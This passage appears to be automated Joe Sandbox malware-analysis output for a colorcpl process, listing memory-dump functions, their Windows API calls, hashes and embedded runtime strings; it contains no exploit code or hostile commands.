Instruction Fuzzy Hash: B201D47AA802287BE720A698DC46FBE772C5B40B55F084159FF04FA1C1E6A4A9054BF2

Function 02878310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0287836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0287838B

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction ID: b813e1b0abfce2963ba82e565f6a3552748caa54fc2a6e3a50dbb20a8c3a62bb
Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction Fuzzy Hash: 8C01F73AA8022877E720B6989C42FBE772C5B40B50F080114FF04FA1C1E694A90547F6

Function 0287ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0287AD52

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 4eace13eae09b565b505b5f584b446c7aef254c659a1efb319ed00ff560e1964
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 67015EBED4020DABDB14EAA4EC41FDEB7799B44308F108195E90CD7281FA31EB04CB92

Function 0288A6CF Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0288A724

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: d3898e4ace954a7836974b04f9f9f579095e7f12570faffb3f56e81a2460965e
Instruction ID: e47a9cf744c995a69e8d6b8d964cd0a357518a4be4d80bdf3566b2a6bcb51bd7
Opcode Fuzzy Hash: d3898e4ace954a7836974b04f9f9f579095e7f12570faffb3f56e81a2460965e
Instruction Fuzzy Hash: A901AFB6204108BFCB58DF99DC80EEB77A9AF8C354F158258FA0DE7251C630E851CBA0

Function 0288A6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0288A724

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 5368d07dc667a65cc999943966b76912fb03a7c3f84a4dea7fee32694a36ff67
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: CA01AFB6210108AFCB58DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4

Function 028891A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0287F040,?,?,00000000), ref: 028891DC

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c39c9f5f3adaadccba5dac45abb76fed316553857b04ac2a1f973720f9d47200
Instruction ID: 10ff451715ec40a1bab34e32c0c1b33912949ad55fb688586b103bc78fcbf977
Opcode Fuzzy Hash: c39c9f5f3adaadccba5dac45abb76fed316553857b04ac2a1f973720f9d47200
Instruction Fuzzy Hash: F9E06D3B3902043AE320759DAC02FA7B39D8B91B20F550026FB0DEB6C0D595F40146A5

Function 02889193 Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0287F040,?,?,00000000), ref: 028891DC

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: edc82f253d86e512b91027fd177c5eace931d732826d63aca046e3f84120e587
Instruction ID: 7beb060bfc1ba68856224ddb4f8f47a818924db39f05c9e85d956b6d49fad308
Opcode Fuzzy Hash: edc82f253d86e512b91027fd177c5eace931d732826d63aca046e3f84120e587
Instruction Fuzzy Hash: CBF0653F7D46047BE23065589C42FB7779A8BD4B10F250029F60AEB7C0D695B90546A5

Function 0288A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02884526,?,02884C9F,02884C9F,?,02884526,?,?,?,?,?,00000000,00000000,?), ref: 0288A64D

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 3c19b0e8a592e16ad846a602f20ae267d29d3dd6d61c634ed738d82375fc9113
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 68E012B6200208ABDB18EF99CC40EA777ADAF88654F118559BA1C9B281C631F9108AB0

Function 0288A7BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0287F1C2,0287F1C2,?,00000000,?,?), ref: 0288A7F0

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 38d3ada025e11c132e22fd61a84fe4aa3e5de14d8ac96328a7c1d1c2e157c71f
Instruction ID: b5e3e992c5a8b04bc49a4f8324ec554c3028eb025b15fc62bc2f4fcce70664b5
Opcode Fuzzy Hash: 38d3ada025e11c132e22fd61a84fe4aa3e5de14d8ac96328a7c1d1c2e157c71f
Instruction Fuzzy Hash: C9E09AB5200204ABCB10EF48CC84EE737A9EF88220F008094FE4C57642C631E8158BF1

Function 0288A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0287F1C2,0287F1C2,?,00000000,?,?), ref: 0288A7F0

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: a520957ad79e3cd90bf5c3162e0157b49edbf53447284a91092048320766c4d6
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 11E01AB5200208ABDB14EF49CC84EE737ADAF88650F018155BA0C57241C935E8108BF5

Function 0287F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02878D14,?), ref: 0287F6EB

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: 27569a6160c51fd01d3a75d51962673570386b6568d4cc833f1f5235c98b2277
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 06D05E6A6903042BEA10BAA99C02F2632896B54A14F490064FA48D72C3E954E0004565

Function 048D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2C24

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e973f17b5b8544fb84cdbe4ff15d1b73ef879336a3caa57d01ebe20dc848361
Instruction ID: 1d79eb109817f255e86d27260af7645f1f6e95f057026e6bd37631139191434f
Opcode Fuzzy Hash: 9e973f17b5b8544fb84cdbe4ff15d1b73ef879336a3caa57d01ebe20dc848361
Instruction Fuzzy Hash: 89B09B719025C5D9FB11F760460871B7A006BD1705F15C561D3034741E4738D5D5F176

Non-executed Functions

Function 000E1975 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000E19A2
GetCurrentProcessId.KERNEL32 ref: 000E19B1
GetCurrentThreadId.KERNEL32 ref: 000E19BA
GetTickCount.KERNEL32 ref: 000E19C3
QueryPerformanceCounter.KERNEL32(?), ref: 000E19D8

Memory Dump Source

Source File: 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000005.00000002.4550455934.00000000000E3000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_colorcpl.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 9fc180cf3996136df10678de66e18d3cfa3aff8fbc361f9349ebb4f27ed6c3d2
Instruction ID: a5f4626eef8878d190c87bf931305a8cc2fb6c0e004e0867c89804a8900eb455
Opcode Fuzzy Hash: 9fc180cf3996136df10678de66e18d3cfa3aff8fbc361f9349ebb4f27ed6c3d2
Instruction Fuzzy Hash: 39111C71D01248EFEB14DBB9D998AAEBBF4FF48711F514865D401FB250E6349B00DB50

Function 000E1AC3 Relevance: 6.0, APIs: 4, Instructions: 13COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,000E1BF9,000E1000), ref: 000E1ACA
UnhandledExceptionFilter.KERNEL32(000E1BF9,?,000E1BF9,000E1000), ref: 000E1AD3
GetCurrentProcess.KERNEL32(C0000409,?,000E1BF9,000E1000), ref: 000E1ADE
TerminateProcess.KERNEL32(00000000,?,000E1BF9,000E1000), ref: 000E1AE5

Memory Dump Source

Source File: 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000005.00000002.4550455934.00000000000E3000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_colorcpl.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 11916f62ea46e7c82e7ea66ddda1e0a197879e43354c94220e803a6460b0b701
Instruction ID: e779c4ce2738e40f1ea400993c49cad113035d273e32bedc017f25ee28e29980
Opcode Fuzzy Hash: 11916f62ea46e7c82e7ea66ddda1e0a197879e43354c94220e803a6460b0b701
Instruction Fuzzy Hash: 6ED01232000184FBE7002BE1ED5CB497F28FB48B62F040400F30EAB031CB799A018F55

Function 048D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 048D293C
___swprintf_l.LIBCMT ref: 048D295E
___swprintf_l.LIBCMT ref: 048D29A3
___swprintf_l.LIBCMT ref: 0490A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0490A54E
::%hs%u.%u.%u.%u, xrefs: 0490A527
:%u.%u.%u.%u, xrefs: 0490A5B8
ffff:, xrefs: 0490A504

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: e07e4c2b749371496318946d174707ab3a6745bce83595e0299eb3afab5b8200
Instruction ID: fb972bdfdc108578b4a71ec5c68336456325dc16938cb55a9319ed583020fb06
Opcode Fuzzy Hash: e07e4c2b749371496318946d174707ab3a6745bce83595e0299eb3afab5b8200
Instruction Fuzzy Hash: F551E9B1A042167FDB11EF98D89097EF7B8BB09204B108B79E495D7645E274FE4097E0

Function 04942410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 049424A6
___swprintf_l.LIBCMT ref: 049424E2
___swprintf_l.LIBCMT ref: 0494257D
___swprintf_l.LIBCMT ref: 049425A3
___swprintf_l.LIBCMT ref: 049425C8
___swprintf_l.LIBCMT ref: 04942608

Strings

:%u.%u.%u.%u, xrefs: 049425FF
::%hs%u.%u.%u.%u, xrefs: 0494249E
ffff:, xrefs: 0494247D, 0494249D
::ffff:0:%u.%u.%u.%u, xrefs: 049424DA

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 83443d2dadc09f77c7d578bcd6f85589e2bc379f20c0657e2904eb0d83311965
Instruction ID: 6b7d96f4093bbfd8d35af2b7894996229b048911a850e59d2ca34b4f9b8ae2ce
Opcode Fuzzy Hash: 83443d2dadc09f77c7d578bcd6f85589e2bc379f20c0657e2904eb0d83311965
Instruction Fuzzy Hash: C451F271A00645AADB30DF9CC890D7EB7BDFF84285B0089B9F496D7641E6B4FA008B60

Function 048C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04904725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04904655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049046FC
CLIENT(ntdll): Processing section info %ws..., xrefs: 04904787
Execute=1, xrefs: 04904713
ExecuteOptions, xrefs: 049046A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04904742

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: a94824ff8d262c20f2ac670814abc55f3b03505a1b7e6e5ec1340df745e62ebf
Instruction ID: 5df09c21ce34fe64267d30dd36972efbfe8859ae973d0d7d63164c90b513225f
Opcode Fuzzy Hash: a94824ff8d262c20f2ac670814abc55f3b03505a1b7e6e5ec1340df745e62ebf
Instruction Fuzzy Hash: 4B51D63164021E6BEB10AAA8DC99FA977A8EB44704F140AADE605E7290E770FE45CF51

Function 000E1463 Relevance: 10.6, APIs: 7, Instructions: 138sleepCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32(?,000E1C08,00000058), ref: 000E1478
Sleep.KERNEL32(000003E8), ref: 000E14AD
_amsg_exit.MSVCRT ref: 000E14C2
_initterm.MSVCRT ref: 000E1516
__IsNonwritableInCurrentImage.LIBCMT ref: 000E1542
exit.MSVCRT ref: 000E15C5

Memory Dump Source

Source File: 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000005.00000002.4550455934.00000000000E3000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_colorcpl.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
String ID:
API String ID: 2849151604-0
Opcode ID: f47bacc0434aaa43ba0b31f576aadafc21f32dddeca83fc8f8fde7f1d452c4db
Instruction ID: 9319858bd3216cf2c60597baa814357495d14551afc67d2ea1d8607ac91b1f74
Opcode Fuzzy Hash: f47bacc0434aaa43ba0b31f576aadafc21f32dddeca83fc8f8fde7f1d452c4db
Instruction Fuzzy Hash: 3741D476A007D5DFEB749B66D8847FD76E4BB88B21F100129E902BB2D0DB788E40CB50

Function 048DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 048DB6BF

Strings

0, xrefs: 048DB66F
-, xrefs: 048DB650
+, xrefs: 048DB65A
0, xrefs: 048DB695

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 7b0da6fd480e469cf4cfdd3283a184b478b00f1fd632720535638e57742fec34
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 5C81A070E072499FDF248E68C8917FEBBB1AF45364F1A4B69E861E7290D734B840CB51

Function 049420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0494214F
___swprintf_l.LIBCMT ref: 04942172

Strings

%%%u, xrefs: 04942146
[, xrefs: 0494212B
]:%u, xrefs: 04942169

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: b91f5c3eed809bc7e065c79542d9b827109aec091e9888112242f2984489b3fa
Instruction ID: ebb340d90f1cb7e183d07cff67062b15b8dc30cfa0fc62984c05d9f8833d07c2
Opcode Fuzzy Hash: b91f5c3eed809bc7e065c79542d9b827109aec091e9888112242f2984489b3fa
Instruction Fuzzy Hash: E1213676A00119ABDB10EFA9D840DBEB7EDEF98684F440566F945D3200E771E901DBA1

Function 048BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049002BD
RTL: Re-Waiting, xrefs: 0490031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049002E7

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 358dd6d2f60639160ef1357fc761e272ca8a426f25cc6377113dcd92f2a32f59
Instruction ID: f6517f05b4c9acf428acdbda0bab131c1ef100edd61d1733cb71b261fe43ea90
Opcode Fuzzy Hash: 358dd6d2f60639160ef1357fc761e272ca8a426f25cc6377113dcd92f2a32f59
Instruction Fuzzy Hash: EFE19F306047419FD725CF28C884B6AB7E4AB89718F144B69EAA5CB3D1E774E944CB82

Function 048CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04907B7F
RTL: Re-Waiting, xrefs: 04907BAC
RTL: Resource at %p, xrefs: 04907B8E

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 9712bfd011144d31f4391d6a4bccd3ddc8ce450ef99e9e9748d982275b26347e
Instruction ID: a344199d0708418d9e14a781634d533797d2517853a8c27bed0e68a35ec44069
Opcode Fuzzy Hash: 9712bfd011144d31f4391d6a4bccd3ddc8ce450ef99e9e9748d982275b26347e
Instruction Fuzzy Hash: ED41BE31711B069FD720DE29D841B6AB7E5EF88724F100E2DE95ADB780EB71F8058B91

Function 048CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0490728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04907294
RTL: Re-Waiting, xrefs: 049072C1
RTL: Resource at %p, xrefs: 049072A3

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 5e59904d08e52bec1fefb55740c72160e006044d75b312553d167eaaba2f328b
Instruction ID: ce2bc5ea0e46141211a672851f64183ee26b1d3b9e3baa7f1ba0b26e0ec7f3a5
Opcode Fuzzy Hash: 5e59904d08e52bec1fefb55740c72160e006044d75b312553d167eaaba2f328b
Instruction Fuzzy Hash: 6241F23170461AAFD720DE69CC41B66B7A5FF84728F104A29F955EB280DB31F852CBD1

Function 04942300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0494238D
___swprintf_l.LIBCMT ref: 049423B3

Strings

%%%u, xrefs: 04942384
]:%u, xrefs: 049423AA

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 5d80d13d7f2b84c6321821c4d0a2d39d442b11c8541d3ed183ade5964f3e970a
Instruction ID: 451e37ffc5225885ebb97bb0815d661897b5537b9cf364ab430f180e20e93fd7
Opcode Fuzzy Hash: 5d80d13d7f2b84c6321821c4d0a2d39d442b11c8541d3ed183ade5964f3e970a
Instruction Fuzzy Hash: A03145726006199FDB20DF29CC40FAE77B8FB44B54F4445A5F849E7240EB30BA449B61

Function 048D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 048D7E8B

Strings

-, xrefs: 048D7DDD
+, xrefs: 048D7DE8

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
